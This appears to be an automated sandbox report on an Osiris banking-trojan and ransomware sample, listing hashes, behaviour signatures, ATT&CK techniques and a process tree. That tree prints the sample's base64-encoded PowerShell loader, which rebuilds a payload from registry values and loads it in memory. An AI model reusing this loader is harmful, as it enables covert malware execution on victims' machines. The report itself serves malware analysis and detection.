osiris | 20d1df07b4e17ee0821043733106bd179a520acd9ec307bdb1703df17cbf6ee7

General

Target

osiris.js
Size

2.5MB
MD5

e00ccaf47b31887d18ccc6d80aaa2a39
SHA1

60b574bcda0024cf90ec3f7e97db28c58cc79552
SHA256

20d1df07b4e17ee0821043733106bd179a520acd9ec307bdb1703df17cbf6ee7
SHA512

5c3181b5440ac31079c8651d752ad890d84b5ee692b37168866e8c0bef1abfcc8d77311c5df7a7e0e72ad33c9ab999e4b096a199c832e42778565be2ede9c4c6

Score

10^/10

osiris banker botnet ransomware

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 1 IoCs

Processes:

GetX64BTIT.exe

pid process

3828 GetX64BTIT.exe
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

17 api.ipify.org
18 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
ransomware

System Information Discovery
T1082
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2924 set thread context of 3764 2924 powershell.exe ImagingDevices.exe

pid	process
3828	GetX64BTIT.exe

flow	ioc
17	api.ipify.org
18	api.ipify.org

description	pid	process	target process
PID 2924 set thread context of 3764	2924	powershell.exe	ImagingDevices.exe

Suspicious behavior: EnumeratesProcesses 6969 IoCs

Processes:

powershell.exeImagingDevices.exe

pid	process
2924	powershell.exe
2924	powershell.exe
2924	powershell.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe
3764	ImagingDevices.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2924 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

ImagingDevices.exe

pid process

3764 ImagingDevices.exe

description	pid	process
Token: SeDebugPrivilege	2924	powershell.exe

pid	process
3764	ImagingDevices.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

wscript.execmd.exepowershell.exeImagingDevices.exe

description	pid	process	target process
PID 504 wrote to memory of 3704	504	wscript.exe	cmd.exe
PID 504 wrote to memory of 3704	504	wscript.exe	cmd.exe
PID 3704 wrote to memory of 2924	3704	cmd.exe	powershell.exe
PID 3704 wrote to memory of 2924	3704	cmd.exe	powershell.exe
PID 3704 wrote to memory of 2924	3704	cmd.exe	powershell.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 2924 wrote to memory of 3764	2924	powershell.exe	ImagingDevices.exe
PID 3764 wrote to memory of 3828	3764	ImagingDevices.exe	GetX64BTIT.exe
PID 3764 wrote to memory of 3828	3764	ImagingDevices.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js
1⤵
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAegBnAGIAbQBnAHMAdgBpACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArACkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAYQByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGIAeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAXQA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkAGUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== "
2⤵
- Suspicious use of WriteProcessMemory
PID:3704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAegBnAGIAbQBnAHMAdgBpACAAIwA+ACQAdQA9ACQAZQBuAHYAOgBVAHMAZQByAE4AYQBtAGUAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAANwAwADAAOwAkAGkAKwArACkAewAkAGMAPQAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcACIAKwAkAHUAKwAiADEAIgA7AFQAcgB5AHsAJABhAD0AJABhACsAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBwAGEAdABoACAAJABjACkALgAkAGkAfQBDAGEAdABjAGgAewB9AH0AOwBmAHUAbgBjAHQAaQBvAG4AIABjAGgAYgBhAHsAWwBjAG0AZABsAGUAdABiAGkAbgBkAGkAbgBnACgAKQBdAHAAYQByAGEAbQAoAFsAcABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQApAF0AWwBTAHQAcgBpAG4AZwBdACQAaABzACkAOwAkAEIAeQB0AGUAcwAgAD0AIABbAGIAeQB0AGUAWwBdAF0AOgA6AG4AZQB3ACgAJABoAHMALgBMAGUAbgBnAHQAaAAgAC8AIAAyACkAOwBmAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABoAHMALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkAewAkAEIAeQB0AGUAcwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAGgAcwAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAH0AJABCAHkAdABlAHMAfQA7ACQAaQAgAD0AIAAwADsAVwBoAGkAbABlACAAKAAkAFQAcgB1AGUAKQB7ACQAaQArACsAOwAkAGsAbwAgAD0AIABbAG0AYQB0AGgAXQA6ADoAUwBxAHIAdAAoACQAaQApADsAaQBmACAAKAAkAGsAbwAgAC0AZQBxACAAMQAwADAAMAApAHsAIABiAHIAZQBhAGsAfQB9AFsAYgB5AHQAZQBbAF0AXQAkAGIAIAA9ACAAYwBoAGIAYQAoACQAYQAuAHIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACQAawBvACkAKQA7AFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABiACkAOwBbAE0AbwBkAGUAXQA6ADoAUwBlAHQAdQBwACgAKQA7AA== "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2924

C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3764

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:3828

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Connection Proxy

1

T1090

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Connection Proxy

1

T1090

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe

MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt

MD5
efe080540179c771d3f5fb83ed67a6c6

SHA1
880d14b09dd8243bce981a589c8d0ba2d5917247

SHA256
1f04cc948752ccf1534fe74074d043a9acab0c02802d1ba8d1aa5d562779dc7a

SHA512
efac3dfaf3407eaa7604d9ca424f310df103430767e16c91b203d1d3f7a5f31729173d82d709db52f9b12133b16f0b7b2c66344e79c91cde499544c08964e5c1

Download Submit
memory/504-2-0x000001644D8A0000-0x000001644D9A5000-memory.dmp

Filesize
1.0MB

Download
memory/2924-16-0x00000000083F0000-0x00000000083F1000-memory.dmp

Filesize
4KB

Download
memory/2924-19-0x0000000009180000-0x0000000009181000-memory.dmp

Filesize
4KB

Download
memory/2924-8-0x00000000074E0000-0x00000000074E1000-memory.dmp

Filesize
4KB

Download
memory/2924-9-0x0000000006EA2000-0x0000000006EA3000-memory.dmp

Filesize
4KB

Download
memory/2924-10-0x0000000007220000-0x0000000007221000-memory.dmp

Filesize
4KB

Download
memory/2924-11-0x00000000073C0000-0x00000000073C1000-memory.dmp

Filesize
4KB

Download
memory/2924-12-0x0000000007430000-0x0000000007431000-memory.dmp

Filesize
4KB

Download
memory/2924-13-0x0000000007CF0000-0x0000000007CF1000-memory.dmp

Filesize
4KB

Download
memory/2924-14-0x0000000007B30000-0x0000000007B31000-memory.dmp

Filesize
4KB

Download
memory/2924-15-0x0000000008100000-0x0000000008101000-memory.dmp

Filesize
4KB

Download
memory/2924-6-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

Filesize
4KB

Download
memory/2924-17-0x0000000009460000-0x0000000009461000-memory.dmp

Filesize
4KB

Download
memory/2924-18-0x0000000009110000-0x0000000009111000-memory.dmp

Filesize
4KB

Download
memory/2924-7-0x0000000006EA0000-0x0000000006EA1000-memory.dmp

Filesize
4KB

Download
memory/2924-20-0x0000000009A00000-0x0000000009A01000-memory.dmp

Filesize
4KB

Download
memory/2924-21-0x0000000009200000-0x0000000009202000-memory.dmp

Filesize
8KB

Download
memory/2924-22-0x00000000095E0000-0x000000000972C000-memory.dmp

Filesize
1.3MB

Download
memory/2924-30-0x0000000006EA3000-0x0000000006EA4000-memory.dmp

Filesize
4KB

Download
memory/2924-4-0x0000000000000000-mapping.dmp

Download
memory/2924-5-0x0000000073DC0000-0x00000000744AE000-memory.dmp

Filesize
6.9MB

Download
memory/3704-3-0x0000000000000000-mapping.dmp

Download
memory/3764-24-0x0000000000401698-mapping.dmp

Download
memory/3764-29-0x0000000000740000-0x00000000007DF000-memory.dmp

Filesize
636KB

Download
memory/3764-23-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/3764-28-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/3828-25-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing